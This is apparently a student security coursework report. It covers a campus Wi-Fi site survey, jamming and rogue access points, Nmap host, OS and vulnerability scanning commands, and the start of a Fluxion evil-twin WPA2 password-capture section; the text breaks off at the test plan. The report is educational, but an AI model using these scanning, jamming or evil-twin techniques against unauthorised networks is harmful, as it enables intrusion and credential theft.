WMSS Documentation Full

Table of Contents
Network Site Survey – Group Part..................................................................................................4
1. Introduction..............................................................................................................................4
2. Overview of Selected Site.......................................................................................................4
2.1. Photos of Site Interior.......................................................................................................5
2.2. Photo of the Access Point.................................................................................................6
3. Site Survey Specification and Analysis...................................................................................6
3.1. Site Survey Specification..................................................................................................6
3.2. Overview of Tools............................................................................................................7
3.3. Access Point Analysis.......................................................................................................7
3.4. Network Heat Map – Ekahau..........................................................................................10
3.5. Access Point Specification..............................................................................................11
4. Penetration Testing on Site....................................................................................................12
4.1. Jamming..........................................................................................................................12
4.1.1. Introduction..............................................................................................................12
4.1.2. Type of Jamming Type............................................................................................12
4.1.3. How to Handle Jamming.........................................................................................13
4.1.4. How the jamming device works..............................................................................14
4.2. Rogue Access Point........................................................................................................15
References......................................................................................................................................17
Vulnerability Testing – Individual Part.........................................................................................18
1. Active Network Scanning in Wireless Local Area Network (Witchen Hendry TP030952). 18
1.1. Introduction.....................................................................................................................18
1.2. Hypothesis.......................................................................................................................18
1.3. Aim..................................................................................................................................19
WIRELESS AND MOBILE SECURITY (CT094-3-3-WMSS) 1

1.4. Objectives........................................................................................................................19
1.5. Network Scanning Tool: Nmap (Network Mapper).......................................................19
1.6. Comparison between Network Scanner..........................................................................20
1.7. Hardware, Software and Configuration..........................................................................21
1.8. Nmap Screenshot............................................................................................................21
1.9. Test Plan..........................................................................................................................23
1.10. Demonstration of Tool................................................................................................24
1.11. Evaluation....................................................................................................................31
1.12. Suggested Solutions and Recommendation................................................................32
1.13. Conclusion...................................................................................................................32
1.14. References...................................................................................................................33
2. Cracking home router Wi-Fi password with Fluxion (Fawwas Hamdi TP034298)..............34
2.1. Introduction.....................................................................................................................34
2.2. Hypothesis.......................................................................................................................35
2.3. Aim..................................................................................................................................35
2.4. Objective.........................................................................................................................35
2.5. Tools................................................................................................................................36
2.5.1. Hardware..................................................................................................................36
2.5.2. Software...................................................................................................................36
2.5.3. Tools For conducting the vulnerability testing (Comparison).................................37
2.6. Test Plan..........................................................................................................................38
2.7. Demonstration.................................................................................................................39
2.8. Evaluation.......................................................................................................................48
2.9. Suggested solution and recommendations......................................................................51
2.10. References...................................................................................................................53

3. Cracking home router Wi-Fi password with Reaver (Anthony Wibowo TP031822)...........54
3.1. Introduction.....................................................................................................................54
3.2. Application of Wireless Technology Applications.........................................................55
3.3. Wi-Fi Security in General...............................................................................................56
3.4. Hypothesis.......................................................................................................................57
3.5. Tools................................................................................................................................57
3.6. Test Plan..........................................................................................................................58
3.7. Demonstration.................................................................................................................58
3.8. Solution and Recommendation.......................................................................................63
3.9. References.......................................................................................................................65
4. Cracking home router Wi-Fi password with Dictionary Attack (Yanto TP032242).............66
4.1. Introduction.....................................................................................................................66
4.2. Hypothesis.......................................................................................................................66
4.3. Aim..................................................................................................................................67
4.4. Objectives........................................................................................................................67
4.5. Test Plan..........................................................................................................................67
4.6. Crack Tool Used.............................................................................................................68
4.7. Tool comparison.............................................................................................................68
4.8. Hardware and Software...................................................................................................69
4.9. Demonstration of Tool....................................................................................................69
4.10. Evaluation....................................................................................................................74
4.11. Solution and Recommendation...................................................................................74
4.12. References...................................................................................................................75

Network Site Survey – Group Part
1. Introduction
Jason [CITATION Jas14 \n \l 1033 ] states that wireless site survey is the best way to gain
information about wireless network optimal coverage. It can be used to have an understanding on
channel interference and uncovered zone. Then with this information, the access point placement
can be re-arranged so it become more effective and reducing the interference between each other.
The below task will cover site survey on APU new campus 6th floor lab. First the tester will take
photos of the site and the photos of the access point location. Then, the wireless site survey will
be done by using an application that able to analyze channel usage and a heat mapper tool. The
tool features will be described and discussed in detail at latter part. Then from the results given
by the tools, analysis and recommendation will be given. Then the next task will be penetration
testing on the site. This penetration testing will be done to check whether the site is secure or not.
2. Overview of Selected Site

As stated above, the chosen site for the site survey activity is APU New Campus 6 th floor lab.
This place consists of 7 Computer Labs and 1 Technical Assistant Office as shown in the figure
below.
Figure 1. APU New Campus 6th Floor.

2.1. Photos of Site Interior
Figure 2. One of the lab in 6th floor.
Figure 3. Access Point that placed in the middle of the lab.

2.2. Photo of the Access Point
Figure 4. Ruckus Wireless Access Point.
3. Site Survey Specification and Analysis

3.1. Site Survey Specification
Cisco [CITATION Cis13 \n \l 1033 ] states that the first step in doing wireless site survey is by
doing an assessment on radio frequency behavior in a specific environment. Then Cisco
[CITATION Cis13 \n \l 1033 ] also define three types of site survey. The first is passive site
survey which the survey is performed by listen-mode only. This mean the tester machine never
connected to the access point directly. This survey is used for checking whether rogue access
point is in the network, or to determine the radio frequency of the access point, or to determine
the noise and interference in that environment. This type of survey will be used as it meets the
objectives of the site survey conducted by the tester. The next type is active survey which the
client machine is connected to the access point. This type of survey is used to determine rate
shifting data or troubleshooting transmission activity. For executing the survey, below are the
specification following Cisco [CITATION Cis13 \n \l 1033 ] guidelines:
1. Environment: Computer Labs with one access point for each lab.
2. Zones: The survey will be done in each lab that does not have ongoing class inside.
3. Survey Target: Radio Frequency, Channel Statistics and Signal Strength
4. Dense Deployment: Yes, there are many access points found in the lab and also it the
floor below and above are all having own access points.

5. Tools for Survey: Acrylic Wi-Fi, Homedale, and Ekahau Heatmapper
3.2. Overview of Tools
Acrylic Wi-Fi - Home Edition (Demo)
As claimed by Tarlogic Security [CITATION Tar16 \n \l 1033 ], Acrylic Wi-Fi is a network
analyzer software that perform Wi-Fi scanning and provide detailed security information and
coverage analysis. It has two types of licenses. The first is Home Edition which provide the free
version of the software with network scanning feature only. The second is Professional Edition
which provide more feature like Wireshark integration, Airpcap support, detecting connected
clients and its details, generating reports and other supports.
Homedale (Free)
Homedale is a free wireless network analyzer software which provides details like detected
Access Point lists, signal graph and frequency usage. Homedale functionality is almost the same
with Acrylic Wi-Fi, but it has one more feature which is Suggested Channel feature. It also has a
more readable frequency usage chart than the Acrylic.
3.3. Access Point Analysis

Acrylic Wi-Fi - Home Edition (Demo)
Figure 5. Network Analysis with Acrylic Wi-Fi.

Figure 6. 2.4GHz Channels usage.
The above figures show Acrylic Wi-Fi survey results, it shows that there are several access
points found in the 6th floor labs. It also can be seen that several access points having the same
SSID name. In here, the analyst able to gather several SSIDs on the 6 th floor. There are 4 most
found access point which also used as the main access point in APU:
- Visitor@APU
- Wireless@APU
- Staff@APU
- BYOD@APU
The Visitor@APU access points is used for any guest coming to APU, this can be seen that the
security is using open type authentication. Wireless@APU also have the same open
authentication, this is because the real authentication is done after the client connected to the
access point which use student ID and their password. Then for Staff@APU and BYOD@APU,
they use WPA2 authentication mode which requires password upon connecting.
From the above figure, it also can be seen that most of the channels used for data transmission
are channel 2, 6, and 13. This is not the most effective channel allocation, as channel 2 and 6 are
still overlapping.

Figure 7. Channel Allocation. [ CITATION Cis15 \l 1033 ]
Based on the above figure from Cisco [CITATION Cis15 \n \l 1033 ], the most effective
channels are 1, 6, and 11. In United States, channel 13 and 14 are not permitted for use. But, in
Asian countries, the channel 13 and 14 is permitted. So, the implementation of APU wireless for
channel 13 is acceptable. While channel 2 access points are recommended to be moved to
channel 1 to prevent interference.
Homedale (Free)
Figure 8. Homedale Network Analysis.
Homedale results also have the same feature with Acrylic Wi-Fi, but it has one more feature
which is Suggested Channel feature. In the above figure, Homedale suggests to use channel
number 10, this is also accepted if the placement of channel become 1, 6, 9/10, 13. Hence there
will be 4 channels usage to prevent single highly used channel. But there still interference

between 6 with 9, or 10 with 13. So, it is recommended to split the most used access point to
channel 2 and 13. While the least used access point will be configured to use channel 9/10.
3.4. Network Heat Map – Ekahau
For the Network Heat Map, the analyst will use Ekahau HeatMapper as the heat map generation
tool. In here a floor plan will be recreated to make it larger and easier to be mapped.

Figure 9. Recreated Floor Plan and the Heat Map.
3.5. Access Point Specification

Description High-end 802.11ac Wave 2 AP with MU-MIMO and
BeamFlex+
Maximum PHY rate 1,733 Mbps (5GHz)
800 Mbps (2.4GHz)
Wi-Fi technology 802.11ac Wave 2 (5GHz)
802.11n (2.4GHz)
Concurrent users 512
Radio chains:streams 4x4:4
BeamFlex gains 6dB
Max. interference mitigation 15dB
PD-MRC Yes
Rx sensitivity -104dBm
ChannelFly Yes
Smart meshing Yes
USB Yes
Ethernet ports 2

4. Penetration Testing on Site
4.1. Jamming
4.1.1. Introduction
Jamming is a term where there are disruptions that result in congestion at the time of
receiving or transmitting data (Robert, 2013). The cause in the reception of the data signal is
usually due to interference or interference from signals that have the same or almost the same
frequency.
The result is the difficulty for the system to know the data is blurred. Jamming is an
action to mess up a signal somewhere. With this technique, the signal can be grounded, so the
signal cannot be captured at all. Jamming would be more dangerous if done by irresponsible
people (eg terrorists), who by their actions incur a network in a paralyzed city (in order to launch
its acts of terror).
Jamming is a device that can partially or completely interfere with node signals, by
increasing the power spectral density
4.1.2. Type of Jamming Type

1. Single-Tone Jammer
A single-tone jammer frequency lies within the specified bandwidth of a jammed
signal. It targets every narrowband communication. Because it uses wireless sensor network of
traditional narrowband technology. The type of jammer tries to hold the node in the specified
bandwidth, which may result in dead links and reduce node coverage.
2. Multiple-Tone Jammer
A jammer that can interrupt multiple channel signals or across multiple channel receivers.
The type of jamming leads to a complete node failure, if the entire channel is compromised. The
only time the node can recover is when the jammer is turned off. Usually, the intruder plays safe
while congestion node with occasional turn off the radio. Thus, make the neighbour node assume
node is not attacked but loss of energy and healing needs. Therefore, detection of the jam node is
very important.
3. Pulsed-Noise Jammer

A pulsating-noise jammer is a wideband jamming, which behaves like a pulsed signal
by turning on and off Cally's periodically. The main purpose of this jammer, is to disrupt spread
spectrum communications by spreading peak jamming during "on" time. Two types of pulsed-
noise jammers are considered, i.e., slowly switching and fast
Switch jammers.
4. ELINT
ELINT is usually a passive system that tries to break down or analyse radar or TCF
communication signals.
4.1.3. How to Handle Jamming

1. Using the SS Technique (spread spectrum)
Data scattered throughout the frequency spectrum makes the signal resistant to
jamming, noise and eavesdropping. Various types of SS such as Direct Sequence (DS),
Frequency hopping (FH), Time hopping (TH) and hybrids (Hanson, 2012). There are both
advantages and disadvantages associated with the use of SS in sensor networks.
A. The advantages of using SS (spread spectrum)
1). Ability to alleviate multi-path interference
2). The Jamming attack is reduced
3). Less power spectral density.
B. Weaknesses using SS (spread spectrum)
1). Bandwidth inefficiency
2). Compels implementation
3). Computing costs.
2. Using FHSS
Using FHSS, which consumes more power as a hop frequency needs to be synchronized.
3. Using IEEE802.15.4
Using the standard IEEE802.15.4 where DSSS with CSMA-CA is used. From the final ZigBee is
being considered as wireless technology for wireless sensor networks such as consuming less
power.

4.1.4. How the jamming device works
1. Exciter
It is the most important part, since the whole process of generating sweeper signals, noise and
oscillator signal (Voltage Control Oscillator) goes from this section.
2. Driver Amplifier
This section serves to amplify the output signal from the Exciter before entering the level of
Power Amplifier. Driver Amplifier circuit is a wideband amplifier and works as a class A or
linear amplifier.
3. Power Amplifier
Is the last part associated with the antenna, this part the way it works similar to Driver Amplifier
that is as a class an amplifier or linear amplifier, output power generated by 100 Watts.
4. Power Supply
Is a source of power supply only for the Power Amplifier only, with 28 V adjustable and the
resulting current is 15 ampere.
5. Antenna Tx
Discone Antenna type is generally less popular, because the wearer of many used in commercial
and military. The advantages of this antenna is in addition to omnidirectional emission is also not
less important ability characteristics of the frequency is very wide (broadband). The equipment
has functioned well, but there is the desire of the prospective user to research the development of
both dimension performance.

4.2. Rogue Access Point
One way to conduct MITM attacks is to use Rogue Access Point (RAP). RAP is an Access Point
that is not installed by Wi-Fi network administrators and has no legitimacy from the
administrator, in other terms RAP is also referred to as Evil Twin Access Point. As shown below
Figure.
Figure 10 Evil Twin Access (Source:

https://d1b10bmlvqabco.cloudfront.net/attach/i2i2dhph8zs6vh/i2z7j27ej7512/i959l5z0vl9c/evll_twin_attack.jpg)
In the implementation of RAP, it can be done by using two kinds of methods that connect the
Access Point directly to the ethernet port on the wired network infrastructure and the other is by
connecting the Wireless device to the Access Point in the scope[ CITATION Kim \l 1033 ].
Based on who is doing RAP implementation then there are generally four types of RAP types as
follows:

1. RAP made by employees: Employees of a particular company or agency install Access Point
on the existing LAN network within the office without any approval from the network
administrator in order to obtain the convenience and convenience of LAN network access in the
office using Wi-Fi. With the RAP is a result of the opening of security gaps on the network,
which allows unauthorized users or attackers access the company network or agency. This type
of RAP often appears in companies or agencies that are less concerned about network security
issues and lack of awareness about security awareness for employees.
2. External RAP created by attackers: RAP is built outside the computer network and not
connected to a company's computer network or agency. Usually used Wi-Fi devices that have a
strong signal that is directed into the targeted office area by using the same SSID name with the
existing SSID in the company's Wi-Fi network or target agency. The goal is to get information
from employees by way of route traffic through RAP.
3. Internal RAP created by an attacker: RAP created by an attacker within the company or
agency and connected to his computer network in order to gain Backdoor Access to the LAN
network, usually this RAP does not propagate the SSID to be unknown to others. Although
difficult to do at the time of implementation, but once successfully done so can lead to
penetration of computer network security.
4. RAP made by Neighbors: The actual RAP is an Access Point created by an office that is
located nearby and its area coverage extends to other offices. Since the purpose is to provide Wi-
Fi access for its internal office then the network administrator of other offices has no right or no
access to turn it off. Although not aimed at malicious but access to RAP Neighbors can cause
security hole.

References
Cisco, 2013. Site Survey Guidelines for WLAN Deployment. [Online]
Available at: http://www.cisco.com/c/en/us/support/docs/wireless/5500-series-wireless-
controllers/116057-site-survey-guidelines-wlan-00.html
[Accessed 28 June 2017].
Cisco, 2015. Chapter: WLAN RF Design Considerations. [Online]
Available at:
http://www.cisco.com/c/en/us/td/docs/solutions/Enterprise/Mobility/emob73dg/emob73/ch3_WL
AN.html
Jason, 2014. Wireless Site Surveys: The Basics. [Online]
Available at: http://www.networkcomputing.com/wireless/wireless-site-surveys-
basics/861543211
Kim, Sang-Eon, C., Byung-Soo, L. & Hong., S., n.d. Rogue AP Detection in the Wireless LAN
for Large Scale Deployment. SYSTEMICS, CYBERNETICS AND INFORMATICS , IV(5), pp.
78-85.
Tarlogic Security, 2016. Acrylic WiFi: Diagnose and improve your Wireless networks. [Online]
Available at: https://www.acrylicwifi.com/en/
[Accessed 17 May 2017].

Vulnerability Testing – Individual Part
1. Active Network Scanning in Wireless Local Area Network (Witchen
Hendry TP030952)
1.1. Introduction
Rouse [CITATION Mar171 \n \l 1033 ] define reconnaissance as a phase where the intruder
engages with the targeted system. In this phase, the attacker will try to gain as much as possible
information about the target machine. Active Network Scanning is one of the step in doing
reconnaissance. The active keyword indicates the process is done by reaching or connecting to
the target directly. Then network scanning is the technique used to gain information about the
scanned network. Compared to the passive scanning, this method is easily detectable by the
target machine as the connection log is saved in the victim machine. But it may give more
valuable information about the host or the local area network.
For a black hat hacker, network scanning is a very useful technique to gain information about the
network and victim machine. While white hacker need to do network scanning to find possible
vulnerabilities and fix the hole before it is exploited by the wrong person. By doing network
scanning, information like alive host in a local network can be gained. Then by knowing alive
host, it can further scan for open ports. This open ports then can be used to find which service is
running in that port. If that service is vulnerable to any attacks. Then the attacker can directly
send the payload to that service. This will enable the attacker to control the victim machine
[ CITATION Raf15 \l 1033 ].
1.2. Hypothesis
Nowadays, the amount of wireless device is uncountable. it is embedded everywhere like mobile
devices, laptops, smart watch, smart car and even other small device as an Internet of Things
(IOT) appliances. This made wireless hacking is one of the most common attack vector found in
the hacking world. This is also supported by an article from Chickowski [CITATION Chi15 \n \l
1033 ] who state that exploitation of Internet of Things is the third most dangerous attack. These
attacks are possible because the attacker able to scan and found all the alive machine in the
network as stated in the introduction part. This scanning process can be easy, fast and automated
by using powerful tool like Nmap. In this paper, the researcher hypothesizes that an attacker can
gain information about the victim network and machine easily by doing network scan, and this
will lead to exploitation. Then the researcher also hypothesizes that if the victim machine able to
defend itself from network scanning and able to become undetectable. The possibility of being
attacked will be lower and the overall number of wireless local area network attacks can be
reduced.
1.3. Aim
This paper will show how an attacker able to scan vulnerable machine in a wireless local area
network by using network scanning technique and ways to prevent it.
1.4. Objectives
- To perform alive host detection on home wireless local area network.
- To perform open port detection for each host.
- To perform vulnerability scanning on each port.
- To analyze the network scanning technique and recommend ways to mitigate that attack.
1.5. Network Scanning Tool: Nmap (Network Mapper)

Nmap [CITATION Nma17 \n \l 1033 ] official online page states that Nmap is a free and open
source utility for network discovery and security auditing. It can be used for tasks such as
network inventory, managing service upgrade schedules, and monitoring host or service uptime.
Nmap [CITATION Nma17 \n \l 1033 ] also states that their application works by using raw IP
packets in novel ways to detect available host in a network, detect running service on that host,
detect the operating system of the host, detect firewall rules, and many others. But there are some
limitations in using Nmap such as it is noisy that it can be easily detected by IDS/IPS. Then the
other limitation of Nmap is, it is hard to scan vulnerabilities using Nmap. To find vulnerabilities
on a host machine, Nmap need to use their Nmap Scripting Engine (NSE) to create the
vulnerable scanner script. While it is very hard and need much knowledge to create one script to
scan a single vulnerability. In the term of vulnerabilities scanning, Nmap is a bit inefficient. If
compared to another well-known network scanner such as Angry IP Scanner [CITATION
ang17 \n \l 1033 ], Nmap is much more advance as it has much more scanning technique to

detect host and the ports. Then there is one more well-known network scanner and vulnerability
scanned named Nessus. All of them have its own advantages and disadvantages. The table below
will show the comparison between these network scanner tools.
1.6. Comparison between Network Scanner
Nmap Angry IP Scanner Nessus
Host Detection Able to detect alive host Able to detect Able to detect alive
and its port. alive host and its host and its port.
port.
Method of port Have huge range of scan TCP, UDP, and TCP, UDP, and
scanning. options like TCP SYN, ICMP scan. ICMP scan.
NULL, FIN, XMAS.
UDP, and ICMP Scan
(One of the main power).
Vulnerability Scan Vulnerability scanning None Vulnerability
through Nmap Scripting scanning through
Engine. security check plugin.
Number of CVE that 566 [ CITATION 0 38376 [ CITATION
can be scanned nma17 \l 1033 ] Ten17 \l 1033 ]
Portable Portable Portable Not Portable
GUI available No (Zenmap is needed) Yes Yes
User friendly and Need to have familiarity Easiest to use as it Easier to use as it has
easy to use on using terminal has GUI and the GUI but the feature is
command and need to feature is simple. more complex.
read the help command.
Processing power Low processing power. Low processing Consume high
power. processing power
Source of information: [ CITATION Raf15 \l 1033 ], [ CITATION JFo10 \l 1033 ], [ CITATION
sir16 \l 1033 ].

1.7. Hardware, Software and Configuration
Hardware:
- Laptop: ASUS K401U
- Wireless Card: TP-Link TL-WN722N
Software:
- Virtualization: VirtualBox 5.12
- Host OS: Windows 10 64-bit (192.168.0.15)
- Guest OS1: Kali Linux 2016.1 (10.0.2.15)
- Nmap (Download for Host OS, while Kali have Nmap pre-installed)
1.8. Nmap Screenshot

Below is the screenshot of Nmap version 7.25 manual page in Kali Linux Operating System.
Figure 11. Nmap Command Options (Target Specification, Host Discovery, Scan Techniques).

While below are the screenshots of Nmap version 7.50 manual page in Windows Operating
System. The target specification, host discovery, and scan techniques manual is the same with
the above screenshot from Kali. Hence below are the continued manual page of Nmap.
Figure 12. Nmap Command Options (Port Specifications, Service Detection, Script Scan, OS Detection).
Figure 13. Nmap Command Options (Timing, Firewall/IDS Evasion, Output).

1.9. Test Plan
Task Task Name or Objective Expected Result Actual Result
ID Command line
1 Run “nmap” To test whether Nmap manual page is Nmap manual page
Nmap is runnable. shown. is shown.
2 Run “nmap To find alive host in Several up host is Several up host is
[target]” the current local area found. found.
network.
3. Run “nmap -O To find the Operating System List of operating
--osscan-guess Operating System of used is showed system is showed.
[target]” the machine
4. Run “nmap -A To scan the target Operating system, Operating system,
[target]” and gain some open ports, service open ports, service
information about and its version and its version
the host. running on the port is running on the port
detected. is detected.
5. Scan the local To find whether a Vulnerable or Not Not Vulnerable
area network vulnerability exists Vulnerable status is status is printed.
with one of the in the current local printed.
vulnerability area network.
with Nmap
Scripting Engine

1.10. Demonstration of Tool
In this demonstration, the tester will test the tools from both Windows as the Host and Kali
Linux from VirtualBox.
Step 1: Check the network address (ipconfig/ifconfig)
Before knowing which hosts are alive in the local area network, Nmap need the network address
of the local area network. Hence, the first command to be run is “ipconfig” for Windows and
“ifconfig” for Kali Linux.
Figure 14. ipconfig and ifconfig command.

Step 2: Scan for alive host (“nmap 192.168.0.*”)
From the above command, the tester know that the local area network address is 192.168.0.0
with 192.168.0.1 as the gateway. Then the next command to be run is “nmap 192.168.0.*” the
star at the back of the IP address mean as a wildcard that will scan from 192.168.0.1 –
192.168.0.255.

Figure 15. Windows Nmap found 4 hosts up.

Figure 16. Kali Nmap found 1 host up.
The above figures show that Windows able to detect 4 hosts successfully because it is in the
local area network, while Kali only detect 1 host which are the host itself. This is due to the
virtualization and the NAT only allow access to the internet but not to the other machine in that
local area network.
Step 3: Operating System Scan (“nmap -O –osscan-guess 192.168.0.7”)

From the above host list, the tester will choose one machine for the operating system scan. The
Nmap in windows will scan a machine will IP address 192.168.0.7 which is another laptop
running windows 8.1. While the Kali Linux will scan the host machine with IP address
192.168.0.15.
The figure below shows that the Nmap in Windows able to detect the operating system of
192.168.0.7 as Windows 7 or Windows 2008 or Windows 8.1. While the Kali Linux detect its
host operating system as Oracle VirtualBox. This a bit confusing as the host is running on
Windows 10, but it shows the Nmap great capability that it successfully detects the VirtualBox
as the virtualization technology by examining the network information.

Figure 17. Operating System Scan

Step 4: Scanning of port service version, host script, and traceroute with aggressive mode
(“nmap -A 192.168.0.7”)
Figure 18. Nmap scan with -A options.
The above scanning shows the result of open port with its service, it also has additional
information which is host script information. It shows a more detailed information like Microsoft
SQL Server, NetBIOS name, and SMB security.

Step 5: Bulk vulnerability cve2015-1635 scanning
(“nmap -A -sV -oX "C:\Users\JuniorXR\Documents\scan1.xml" --script http-vuln-cve2015-
1635.nse --script-args vulns.showall 192.168.0.*”)
The above command is to scan a http vulnerability that enable an attacker to do remote code
execution.
Command breakdown:
1. “-A” is used to do the aggressive mode scanning that return result as done in previous
step.
2. “-sV” is used to probe the version of service run on open ports.
3. “-oX [filepath]” is used to create an XML output of the scan.
4. “--script [nsefile]” is used to scan the vulnerability in the port by using the NSE file.
5. “--script-args vulns.showall” is used to show the vulnerabilities results.
6. “192.168.0.*” is used to scan all the host from 192.168.0.1 – 192.168.0.255.
Figure 19. Vulnerability scan results

The above XML output file show the result scan on network 192.168.0.*. It shows that the
address 192.168.0.1 (D-Link International) which is the home residential gateway or router has
the hostname of “WirelessAP”. This home router is running a http server on port 80, this is not
surprising as it is used for the home user to access the router configuration by accessing that
router IP address from a web browser. Because this host has a http server running, Nmap do a
vulnerability cve2015-1635 check which is specified in the command option, and the result
shows that this service is not vulnerable.
Figure 20. Scan result.

Figure 21. Scan result.
1.11. Evaluation
The above demonstration shows that with Nmap, the tester able to scan numerous hosts with its
numerous ports vulnerability in one single command. Even though the result shows that there is
no vulnerable HTTP server in the local area network. It meets the aims and objectives of the
testing. It also proves the hypothesis which show how an attacker able to exploit huge amount of
vulnerable device automatically. As it is caused by their ability in scanning huge amount of
vulnerable device in an easy way.
In this network scanning, the tester is unable to use Nmap in Kali Linux. This is caused by Kali
Linux that run as a virtual environment, this made Nmap unable to reach other machine except
its own host in that local area network.
The above scan demonstration is a success as the Windows operating system is the host
operating system and directly connected to the local area network.
1.12. Suggested Solutions and Recommendation
Based on the above Nmap scanning ability, the only way to fully prevent the scanning process is
to block all incoming packets, but this is not a good solution as if the machine is connected to the
internet, it will have opened port. The only best way is to have an Intrusion Detection System
(IDS) or Intrusion Prevention System (IPS) installed. Both tools can detect whether there is
malicious activity like several ports probing activity that originating from the same source of IP
address. Then it is also recommended to set the firewall rule properly so there is no untrusted IP
address trying to access an open port maliciously. While to defend from other network scanners,
it is good to block the ICMP echo request. This is because most of the scanner will use ICMP as
the first move to detect alive hosts.
While the above solution is for defending point of view, Nmap also can be used for penetration
testing. This is to test whether the machine is vulnerable or not, if Nmap can detect any
vulnerability in the existing machine. Then the administrator must update that vulnerable service
as soon as possible to prevent any exploitation.
1.13. Conclusion
To conclude, this active network scanning is useful for checking the vulnerability of a machine.
Administrator able to check whether their local area network is secured or not. If there is any
vulnerability found, the system administrator needs to update the system directly so it will not be
exploited by an attacker. The above testing also show that Nmap is a very powerful tool for
network scanning. It can be used to scan many devices in one single command, while Nmap can
be used for good purpose, it also can be used by wrong person to do malicious things. As a
system security administrator, it is a must for them to learn on how to use Nmap and leverage its
capabilities to find system vulnerabilities and secure it directly.

1.14. References
angryip.org, 2017. Angry IP Scanner. [Online]
Available at: http://angryip.org/
Baloch, R., 2015. Ethical Hacking and Penetration Guide. 1 ed. Boca Raton: CRC Press.
Chickowski, E., 2015. 6 Most Dangerous New Attack Techniques in 2015. [Online]
Available at: http://www.darkreading.com/vulnerabilities---threats/6-most-dangerous-new-
attack-techniques-in-2015/d/d-id/1320120
Forlanda, J., 2010. Nessus vs Nmap. [Online]
Available at: http://www.brighthub.com/computing/smb-security/articles/72408.aspx
Nmap, 2017. Nmap: the Network Mapper. [Online]
Available at: https://nmap.org/
nmap, 2017. Scripts. [Online]
Available at: https://nmap.org/nsedoc/categories/vuln.html
Rouse, M., 2017. active reconnaissance. [Online]
Available at: http://whatis.techtarget.com/definition/active-reconnaissance
sirabhinavjain.com, 2016. Comparison of Network Security tools –NESSUS Vs NMAP. [Online]
Available at: http://sirabhinavjain.com/wp/comparison-of-network-security-tools-nessus-vs-
nmap/
Tenable, 2017. Plugins. [Online]
Available at: https://www.tenable.com/plugins/index.php?view=all

2. Cracking home router Wi-Fi password with Fluxion (Fawwas Hamdi
TP034298)
2.1. Introduction
In the current era of globalization, the advancement of communication technology is the most
important factor on the role of some communities to gain access to information. Utilization of
wireless-based communication network (without cable) is one of the communication media that
developed until now. The provision of free wireless or Wi-fi facilities in public places is a boon
for some, free public Wi-fi facilities are the main targets of cybercrime, so we do not think of
network security as trivial.
Recently, hacker forums in cyberspace rampant with a discussion about a program that said can
get a wireless password type WPA2 security without having to crack the used algorithm. Fluxion
is a program used as a wireless security testing tool for WPA2 types. Where in this program
adopt from some technique commonly used to get an information, Fluxion work on Linux
operating system and now become popular because of its ease of use[ CITATION Sha16 \l
14345 ].

2.2. Hypothesis
Wi-Fi uses radio waves on the frequency of public property that is free to use by all circles with
certain limits. Each Wi-Fi has a certain range of areas depending on the power and antenna used.
This causes a variety of possible activity occurs but the researcher will be focuses on Evil Twin
attack. The researcher proposed this attack because it is very simple only utilize the Wi-Fi signal
and the security awareness of the victim. Kali Linux virtual machines will be utilized as the
attacking environment, Wireless USB adapter is also required to scan the Wi-Fi signal in the
attacker area. The vulnerability testing will be conducted when the Wi-Fi target is found. And
then next is to capture a handshake that will be used later to verify password.
If the handshake is already acquired then the next step will be making the FakeAP. FakeAP will
be supported by a web interface in order to attacker to gain the real password. The web interface
will ask the victim to enter the real password, and then the attacker will be comparing the
handshake and the password. After comparison is done and the handshake and the password is
match then the attacker can gain access to the Wi-Fi. This attack will rely on the victim
awareness about security, if the victim have a good knowledge about security and social
engineering then this attack will be pointless.
2.3. Aim
To use Fluxion to conduct the vulnerability testing on the router with the intent to gain the
password of the Wi-Fi and propose a solution to overcome the vulnerability.
2.4. Objective
There are several objectives that the researcher wants to achieve:
1. Figure out how Fluxion able to exploit the vulnerability on the router
2. Obtain the Wi-Fi password using Fluxion with Fake AP
3. To figure out how to prevent the existing problem that arise from the vulnerability testing
process.

2.5. Tools
2.5.1. Hardware
These are the list of the hardware that will be used to conduct the vulnerability testing.
1. Asus V551L
 6th Gen Intel Core i7-4500 processor
 8GB RAM
 OS Windows 10
2. TP-LINK TL-WN722N Wi-Fi adapter
 Monitor Mode supported
 IEEE 802.11n
 Suitable for Kali Linux
3. TP-LINK Archer C5
 IEEE 802.11 ac/n/g/b/a
 Dual Band 2.4GHz/5GHz
 2 Antennas
 Password: sulsel2017
2.5.2. Software
1. VMware Workstation 12 Player
Virtual machine (VM) is an environment, usually a program or operating system, which is not
physically present but is run in another environment. In this context, the VM is called "guest"
while the environment that runs it is called "host". The basic idea of a virtual machine is to
harvest hardware from one computer (CPU, memory, disk, etc.) to multiple execution
environments, thus creating the illusion that each environment runs its own (separate)
computer[ CITATION vmw17 \l 14345 ]. In this vulnerability testing we will be using VMware
Workstation 12 Player because it is very easy to use and free.
2. Kali Linux 64 Bit
Kali Linux is an open source project that is maintained and funded by Offensive Security, a
provider of world-class information security training and penetration testing services. That all the

benefits make me to choose it to conduct my Wi-Fi hacking. Most of popular tools can be easy
installed on Kali-Linux to do our research[ CITATION Kal17 \l 14345 ].
3. Fluxion 0.23
Fluxion is a mixture of technical and social engineering automation that trick the users into
passing Wi-Fi the passwords in a matter of keystrokes. In particular, it is a social engineering
framework using an evil twin technique, integrated jamming, and handshake capture
functionality to ignore hardware and focus on a software. Tools like Wifiphisher execute similar
attacks, but do not have the ability to verify the WPA password[ CITATION Sha16 \l 14345 ].
2.5.3. Tools For conducting the vulnerability testing (Comparison)
These are the comparison of the tools chosen for conducting the vulnerability testing, the
researcher will be focused on the software and compare it to similar application that will be used
to conduct the vulnerability testing.
2.5.3.1. Functions
LINSET is a software that allows you to get a password Wi-Fi with WPA or WPA2 security type
without having to do Brute Force using wordlist. The technique used by LINSET is "Evil Twin
Attack", a technique that attackers use for Create the same wireless network name as the network
name Wireless is the original / legitimate or called Wireless twin. The attacker will Disturbs and
produces a stronger signal than a signal Legitimate or deactivate a legitimate access point to
guide the user into the attacker network by directing denial-of-service attacks Against the
legitimate network, or create Radio frequency interference around it.
Fluxion is a development from LINSET but with the improvement on monitor interface that
mon0 is not supported by Fluxion but Wlan0mon is supported. These monitor interface is
coming along with the newest version of Aircrackng1.2RC2 that supported
Wlan0mon[ CITATION Sad17 \l 14345 ].
2.5.3.2. Limitations
LINSET in this application does not update the package to match the Monitoring Interface used
on Aircrackng1.2RC2 and above that is no longer use interface Mon0 but turned into Wlan0mon.
this difference brings trouble for those who using the version below aircrackng1.2. it is safe to
say that LINSET will not work using Wlan0mon because of the differences on the monitor mode
on the aircrack that LINSET use to scan their data. [ CITATION Sad17 \l 14345 ].

2.6. Test Plan
For the Hypothesis to be tested, a test plan is required to clear what are the task and help to
achieve researcher target. The task will be listed step by step, and then describe a particular task
